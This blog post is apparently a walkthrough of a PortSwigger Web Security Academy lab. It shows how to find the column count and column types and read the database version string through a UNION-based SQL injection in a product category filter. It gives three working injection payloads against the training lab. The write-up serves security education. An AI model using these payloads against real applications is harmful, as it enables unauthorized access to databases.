Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

Posted on 2023-04-25 | Post modified | In Security Practice｜Portswigger Web Security Academy｜SQL |

Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

tags: `Portswigger Web Security Academy` `Web`

Description: his lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Goal: To solve the lab, display the database version string.

Exp

Consider # of column

Payload: ?category=Accessories' union select NULL,NULL -- #
Consider column type

Payload: ?category=Accessories' union select 'a','a' -- # Both of them contained text.
Attack

Payload: ?category=Accessories' union select 'abc',@@version -- #

Post author: SBK6401
Post link: https://bernie6401.github.io/Lab-SQL-injection-attack,-querying-the-database-type-and-version-on-MySQL-and-Microsoft/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.